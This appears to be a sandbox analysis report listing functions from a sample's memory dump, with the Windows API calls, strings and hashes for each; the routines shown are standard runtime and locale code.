Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008ECE5C

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5ef1dccd2d350b52936f8f886da4e283269b1daeae4cb044cef8eb53a2ab0b0a
Instruction ID: 672322913da7d4004373647c982f1cbd0420fc62189c16dd66936ab20a616724
Opcode Fuzzy Hash: 5ef1dccd2d350b52936f8f886da4e283269b1daeae4cb044cef8eb53a2ab0b0a
Instruction Fuzzy Hash: 3421B072A00287ABDB289F2ADC42EBA37A8FF46310B14007AFD01C6141EB74ED018B54

Uniqueness

Uniqueness Score: -1.00%

Function 008ECA8F Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

EnumSystemLocalesW.KERNEL32(008ECBB5,00000001,00000000,?,-00000050,?,008ED1E6,00000000,?,?,?,00000055,?), ref: 008ECB01

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d955a385654e5fd9cb557f1e0fd748c762785c8657a0499b766436d6e5bdc2f6
Instruction ID: 32f9da06207876d2da279aecb6d160c00ba0c4622cb2312bcd063b0feac6b50c
Opcode Fuzzy Hash: d955a385654e5fd9cb557f1e0fd748c762785c8657a0499b766436d6e5bdc2f6
Instruction Fuzzy Hash: 951129376007055FDB189F3AD89257ABB91FF85368B14443DE986C7B40E771A903CB40

Uniqueness

Uniqueness Score: -1.00%

Function 008ED037 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,008ECDD1,00000000,00000000,?), ref: 008ED063

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9b243bd45b4d77108935210a8853457b1a23475d9bc531028d77047f4d8c181f
Instruction ID: 0b1ee9f49e12323eea0e22d44fbc7536beb55ef2a1fa6d1d24204389481648da
Opcode Fuzzy Hash: 9b243bd45b4d77108935210a8853457b1a23475d9bc531028d77047f4d8c181f
Instruction Fuzzy Hash: 59F0F932900656BBDB245A368C06BBA7B58FB81364F084424EC01E3180EA74FE47C690

Uniqueness

Uniqueness Score: -1.00%

Function 008ECB2A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

EnumSystemLocalesW.KERNEL32(008ECE08,00000001,?,?,-00000050,?,008ED1AA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 008ECB74

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e6bc4f8f3cfe3ad6553094aa24be66cae07bcab12e6d0817c048615753430cee
Instruction ID: 31388b74d6ee369fd354ef734c37b8cd9727930367c973244dfa8a991ba4ced8
Opcode Fuzzy Hash: e6bc4f8f3cfe3ad6553094aa24be66cae07bcab12e6d0817c048615753430cee
Instruction Fuzzy Hash: 18F0C2366003446FDB249F3AD882A7ABB91FBC2778B05442DF9068B690D6B19C02CA90

Uniqueness

Uniqueness Score: -1.00%

Function 008E5CE6 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008DDF0D: EnterCriticalSection.KERNEL32(?,?,008E32D8,?,008FD618,00000008,008E349C,?,?,?), ref: 008DDF1C

EnumSystemLocalesW.KERNEL32(008E5CD9,00000001,008FD6D8,0000000C,008E6148,00000000), ref: 008E5D1E

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e65c49a514eb3e0256f36b6345d9cc4ca0fca796ae668d15ccefac88fe77208d
Instruction ID: e9b9f1d802f5d3c3ae073124c2ef01df83eaacbce77d8bda18e76f3dc4b7dc4c
Opcode Fuzzy Hash: e65c49a514eb3e0256f36b6345d9cc4ca0fca796ae668d15ccefac88fe77208d
Instruction Fuzzy Hash: B5F03772A48304DFD700EFA8E802BA977B0FB45720F10852AF511EB3A1DBB94940CF85

Uniqueness

Uniqueness Score: -1.00%

Function 008ECA44 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

EnumSystemLocalesW.KERNEL32(008EC99D,00000001,?,?,?,008ED208,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 008ECA7B

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6e02dc7c0a1ce9ff947d0615fa95c7c1fa321a8dd7bca673df16de30a708aa5e
Instruction ID: b93cc7afbce585d3c8a84a323df3ad34872934b19d1e8be3c2d07071703a2d22
Opcode Fuzzy Hash: 6e02dc7c0a1ce9ff947d0615fa95c7c1fa321a8dd7bca673df16de30a708aa5e
Instruction Fuzzy Hash: 26F0E53670024967CB14AF3AE84AA7ABF95FFC2720B068069EA06CB651C6759D43C790

Uniqueness

Uniqueness Score: -1.00%

Function 008E624C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,008E2888,?,20001004,00000000,00000002,?,?,008E1E8A), ref: 008E6280

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ad8b90bbcdf1870aa89d93fde45c5a8d4242c6d8968c0a69a46810a90b84cd65
Instruction ID: b31782b94f44d5011e60cd30450b9376a88847b1c35d6aa4f62fcaccac98cc56
Opcode Fuzzy Hash: ad8b90bbcdf1870aa89d93fde45c5a8d4242c6d8968c0a69a46810a90b84cd65
Instruction Fuzzy Hash: 3BE04F35900698BBCF122F72EC08EAE7F26FF557A0F044021FD05A5221DB318971AAE5

Uniqueness

Uniqueness Score: -1.00%

Function 008D71EF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000071FB,008D675F), ref: 008D71F4

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 12558f1fce7df9c2832e1374c10f03cf06dcc5c466ce13daebc1ea9e4eb0c7cd
Instruction ID: e967d91f481628d7682b9b83baca7be2818b9311443c48b13054fc93db9eccb7
Opcode Fuzzy Hash: 12558f1fce7df9c2832e1374c10f03cf06dcc5c466ce13daebc1ea9e4eb0c7cd
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 008ED368 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 008ED368

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a6837b857005e28cb075a46b6f20f91cc9f653cb23ed8b2319222c2576e4dd6c
Instruction ID: 5c1c64bbaa7b5418d167cf75a6003931b48b9b7de384c453a91ddc88994c4617
Opcode Fuzzy Hash: a6837b857005e28cb075a46b6f20f91cc9f653cb23ed8b2319222c2576e4dd6c
Instruction Fuzzy Hash: 59A02430300101CFC3004F31DF0471D35DC75451C071040555004C1030D73040F0DF00

Uniqueness

Uniqueness Score: -1.00%

Function 008EC253 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 3e2a6c2aca38abb17a2dfe581c3b3b960ff7ea4c9cb6cccb01b2330021a850a0
Instruction ID: 60ad264dcca8c4e0491134d66bc0a94da083dce4413f1c61ae35e921a2920362
Opcode Fuzzy Hash: 3e2a6c2aca38abb17a2dfe581c3b3b960ff7ea4c9cb6cccb01b2330021a850a0
Instruction Fuzzy Hash: E6B11C359007859BDB349F2ACC92BB7B3A8FF56308F54452DEA43C6681EA75F982C710

Uniqueness

Uniqueness Score: -1.00%

Function 008E6550 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction ID: 1cf0398bd2ffb1f49115c36d7d8f2531e82865207051e836ebed92d071b21587
Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
Instruction Fuzzy Hash: E0E08C32A11268EBCB24DB8DC90498AF3FCFB4AB50B11009AB901D3110D270EE00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 008E13E3 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da4f83a5918d30f6bdc2d3a9b5a9a71a98674656316bf03d7550efdecabfc24
Instruction ID: cf5b875d545abc44d1b7a26063aa031ce375a652abb213495df99fb68f26718a
Opcode Fuzzy Hash: 3da4f83a5918d30f6bdc2d3a9b5a9a71a98674656316bf03d7550efdecabfc24
Instruction Fuzzy Hash: C3C08CB4100A8046CE29892A827ABA43356F3A3BC7F80088CC4428BBC2D52E9C87D602

Uniqueness

Uniqueness Score: -1.00%

Function 008D6531 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008D6537
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 008D6545
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 008D6556
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 008D6567

Strings

kernel32.dll, xrefs: 008D6532
GetCurrentPackageId, xrefs: 008D653F
GetSystemTimePreciseAsFileTime, xrefs: 008D654B
GetTempPath2W, xrefs: 008D655C

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: e5881916ac001597022c6703f4fbc45e88ca5d67fe0ae40eef3941351cf47e2c
Instruction ID: ac2a8e8a3e7f1434f943c76dcebb57b474a9765b080e9d40d1bb0d8875a31399
Opcode Fuzzy Hash: e5881916ac001597022c6703f4fbc45e88ca5d67fe0ae40eef3941351cf47e2c
Instruction Fuzzy Hash: 43E0EC32969B54AFC7429FB4BC0DDA73FA4FB8A7117011112FB25D2360DA784444DB90

Uniqueness

Uniqueness Score: -1.00%

Function 008D9CE8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 008D9E07
___TypeMatch.LIBVCRUNTIME ref: 008D9F15
_UnwindNestedFrames.LIBCMT ref: 008DA067
CallUnexpected.LIBVCRUNTIME ref: 008DA082

Strings

csm, xrefs: 008D9E3E
csm, xrefs: 008D9D25
csm, xrefs: 008D9D92

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 416d481ae3b6c99810dbfc1d313cdbffb50066cf70acac33ccdd846e15b45ab1
Instruction ID: 6bbda13b98c10cc47f3a0142070ba4b8a73a3714595be4d22758409314c9de8f
Opcode Fuzzy Hash: 416d481ae3b6c99810dbfc1d313cdbffb50066cf70acac33ccdd846e15b45ab1
Instruction Fuzzy Hash: 61B12971800209EFCF19EFA8C8819AEBBB5FF14310F14425AE855EB316D775DA51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008F120B Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00E00520,00E00520,?,7FFFFFFF,?,008F14DB,00E00520,00E00520,?,00E00520,?,?,?,?,00E00520,?), ref: 008F12B1
__alloca_probe_16.LIBCMT ref: 008F136C
__alloca_probe_16.LIBCMT ref: 008F13FB
__freea.LIBCMT ref: 008F1446
__freea.LIBCMT ref: 008F144C
__freea.LIBCMT ref: 008F1482
__freea.LIBCMT ref: 008F1488
__freea.LIBCMT ref: 008F1498

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 7a46b5b448eb2043c852210127aea8848b5810fe7d36c77172b47c33e408bbc6
Instruction ID: f95eb7920ff1f902130fe6177eb1fffc310d31c92d3e5b15efc1f895fcda71fd
Opcode Fuzzy Hash: 7a46b5b448eb2043c852210127aea8848b5810fe7d36c77172b47c33e408bbc6
Instruction Fuzzy Hash: 2671E57290024DDBDF219EB88C49BBE77B6FF96310F29005AEA14F7281E7759C408765

Uniqueness

Uniqueness Score: -1.00%

Function 008D9780 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008D97B7
___except_validate_context_record.LIBVCRUNTIME ref: 008D97BF
_ValidateLocalCookies.LIBCMT ref: 008D9848
__IsNonwritableInCurrentImage.LIBCMT ref: 008D9873
_ValidateLocalCookies.LIBCMT ref: 008D98C8

Strings

csm, xrefs: 008D985D

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 1fc461518d61589a191f2d6e0437624fe099568faf9641149bae4ce8d8e55b24
Instruction ID: 4048796f94b82637864d84e4eaeec704ced3b50a6803d4375cc33cda5a07dde6
Opcode Fuzzy Hash: 1fc461518d61589a191f2d6e0437624fe099568faf9641149bae4ce8d8e55b24
Instruction Fuzzy Hash: 7341B534E00208ABCF10DF6CC884AAEBBB5FF46724F148266E954EB352D735D915CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008EFB4E Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8503129c999a92c48a03d4ae7115f81a186de67a53d6e0c14fc4365eb180d1
Instruction ID: a8363d4713076d74c77ca00b8f85f8bdad9d7eb46ac1194e099ce26bb564e96e
Opcode Fuzzy Hash: 9f8503129c999a92c48a03d4ae7115f81a186de67a53d6e0c14fc4365eb180d1
Instruction Fuzzy Hash: 1FB1C670A0468AAFDB11DF9AD840BADBBB1FF86314F144165E605DB3A3C770AD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008D4F73 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 008D4F7A
std::_Lockit::_Lockit.LIBCPMT ref: 008D4F84
int.LIBCPMT ref: 008D4F9B

Part of subcall function 008D260D: std::_Lockit::_Lockit.LIBCPMT ref: 008D261E
Part of subcall function 008D260D: std::_Lockit::~_Lockit.LIBCPMT ref: 008D2638

codecvt.LIBCPMT ref: 008D4FBE
std::_Facet_Register.LIBCPMT ref: 008D4FD5
std::_Lockit::~_Lockit.LIBCPMT ref: 008D4FF5

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: a2c50d090f2da20c8c5b3374f43d4502c458f93f756e6c6cede42bb6362df215
Instruction ID: c95dcba556d6d7e14584fb95f72d44b5b9c3371694aa728991117344c3dad155
Opcode Fuzzy Hash: a2c50d090f2da20c8c5b3374f43d4502c458f93f756e6c6cede42bb6362df215
